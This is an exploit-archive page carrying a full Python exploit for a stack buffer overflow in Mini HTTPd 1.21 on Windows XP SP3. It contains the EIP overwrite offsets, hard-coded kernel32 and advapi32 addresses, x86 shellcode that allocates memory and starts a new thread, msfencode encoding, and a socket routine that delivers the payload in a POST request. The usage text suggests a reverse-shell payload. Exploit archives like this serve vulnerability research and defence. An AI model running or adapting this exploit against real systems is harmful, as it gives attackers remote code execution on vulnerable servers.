what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Mini HTTPd 1.21 Stack Buffer Overflow

Mini HTTPd 1.21 Stack Buffer Overflow
Posted Feb 22, 2014
Authored by TheColonial

Mini HTTPd version 1.21 stack buffer overflow POST exploit for Windows XP SP3.

tags | exploit, overflow
systems | windows
SHA-256 | 6b9603bbda9cff25f4c22bcdc841389ee80652a11577c40f599cd58da168b97b

Mini HTTPd 1.21 Stack Buffer Overflow

Change Mirror Download
#!/usr/bin/python
#
# Title: Mini HTTPD stack buffer overflow POST exploit
# Author: TheColonial
# Date: 20 Feb 2013
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Vendor Homepage: http://www.picolix.jp/
# Version: 1.21
# Tested on: Windows XP Professional SP3
#
# Description:
# This is a slightly more weaponised version of the Mini HTTPD buffer overflow
# written by Sumit, located here: http://www.exploit-db.com/exploits/31736/
# I wrote this up because the existing version had a hard-coded payload and
# didn't work on any of my XP boxes.
#
# The instability of the existing is down to bad chars, and the parent thread
# killing off the child thread when the thing is still running. This exploit
# allocates memory in a safe area, copies the payload to it, creates a new
# thread which runs the payload and then suspends the current thread. The
# suspending of the thread forces the parent to kill it off rather than let
# it crash and potentially bring the process down.
#
# Run the script without arguments to see usage.

import struct, socket, sys, subprocess

# Helper function that reads the body of files off disk.
def file_content(path):
with open(path, 'rb') as f:
return f.read()

# Sent the payload in the correct format to the target host/port.
def pwn(host, port, payload):
print "[*] Connecting to {0}:{1}...".format(host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Connected, sending payload {0} bytes...".format(len(payload))
payload = "POST /{0} HTTP/1.1\r\nHost: {1}\r\n\r\n".format(payload, host)
s.send(payload)
s.shutdown
s.close
print "[+] Payload of {0} bytes sent, hopefully your shellcode executed.".format(len(payload))

# Create the part of the payload creates a thread to run the final payload in.
def create_payload_thread(final_payload_size):
VirtualAlloc = struct.pack("<L", 0x7c809AE1) # in kernel32
CreateThread = struct.pack("<L", 0x7c8106c7) # in kernel32
SuspendThread = struct.pack("<L", 0x7c83974A) # in kernel32

payload = ""
payload += "\x83\xec\x02" # add esp, 0x2 (aligns the stack)
payload += "\x89\xe6" # mov esi, esp
payload += "\x83\xc6\x00" # add esi, <some offset filled later>
count_offset = len(payload) - 1

# zero out ebx because we use zero a lot
payload += "\x31\xdb" # xor ebx,ebx

# allocate some memory to store our shellcode in which is
# away from the current active area and somewhere safe
payload += "\x6a\x40" # push 0x40
payload += "\x68\x00\x30\x00\x00" # push 0x3000
payload += "\x68\x00\x10\x00\x00" # push 0x1000
payload += "\x53" # push ebx
payload += "\xB8" + VirtualAlloc # mov eax,<address>
payload += "\xff\xd0" # call eax

# copy the payload over to the newly allocated area
size_bin = struct.pack("<L", final_payload_size + 4)
payload += "\xb9" + size_bin # mov ecx,final_payload_size
payload += "\x89\xc7" # mov edi,eax
payload += "\xf2\xa4" # rep movsb

# create the thread with a starting address pointing to the
# allocated area of memory
payload += "\x53" # push ebx
payload += "\x53" # push ebx
payload += "\x53" # push ebx
payload += "\x50" # push eax
payload += "\x53" # push ebx
payload += "\x53" # push ebx
payload += "\xB8" + CreateThread # mov eax,<address>
payload += "\xff\xd0" # call eax

# We call SuspendThread on the current thread, because this
# forces the parent to kill it. The bonus here is that doing
# so prevents the thread from dying and bringing the whole
# process down.
payload += "\x4b" # dec ebx
payload += "\x4b" # dec ebx
payload += "\x53" # push ebx
payload += "\xB8" + SuspendThread # mov eax,<address>
payload += "\xff\xd0" # call eax
payload += "\x90" * 4

# fill in the correct offset so that we point ESI to the
# right location at the start of the final payload
size = len(payload) + final_payload_size % 4

print "[*] Final stage is {0} bytes.".format(final_payload_size)

offset = struct.pack("B", size)

# write the value to the payload at the right location and return
return payload[0:count_offset] + offset + payload[count_offset+1:len(payload)]

# Creates the first stage of the exploit which overwrite EIP to get control.
def create_stage1():
eip_offset = 5412
jmp_esp = struct.pack("<L", 0x7e4456F7) # JMP ESP in advapi32

eip_offset2 = eip_offset + 4

payload = ""
payload += "A" * eip_offset # padding to reach EIP overwrite
payload += jmp_esp # address to overwrite IP with
payload += "\x90" # alignment
payload += "\x83\xEC\x21" # rejig ESP
return payload

# Create encoded shellcode from the given payload.
def create_encoded_shellcode(payload):
print "[*] Input payload of {0} bytes received. Encoding...".format(len(payload))
params = ['msfencode', '-e', 'x86/opt_sub', '-t', 'raw',
'BufferRegister=ESP', 'BufferOffset=42', 'ValidCharSet=filepath']
encode = subprocess.Popen(params, stdout = subprocess.PIPE, stdin = subprocess.PIPE)
shellcode, _ = encode.communicate(payload)
print "[*] Shellcode of {0} bytes generated.".format(len(shellcode))
return shellcode

print ""
print "MiniHTTPd 1.21 exploit for WinXP SP3 - by TheColonial"
print "-----------------------------------------------------"
print ""
print " Note: msfencode must be in the path and Metasploit must be up to date."

if len(sys.argv) != 4:
print ""
print " Usage: {0} <host> <port> <payloadfile>".format(sys.argv[0])
print ""
print " host : IP/name of the target host."
print " port : Port that the target is running on."
print " payloadfile : A file with the raw payload that is to be run."
print " This should be the raw, non-encoded output of"
print " a call to msfpayload"
print ""
print " eg. {0} 192.168.1.1 80 reverse_shell_raw.bin"
print ""
else:
print ""
print " Make sure you have your listeners running!"
print ""

host = sys.argv[1]
port = int(sys.argv[2])
payload_file = sys.argv[3]
stage1 = create_stage1()
final_stage = file_content(payload_file)
thread_payload = create_payload_thread(len(final_stage))
shellcode = create_encoded_shellcode(thread_payload + final_stage)
padding = "A" * 0x10
pwn(host, port, stage1 + shellcode + padding)


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close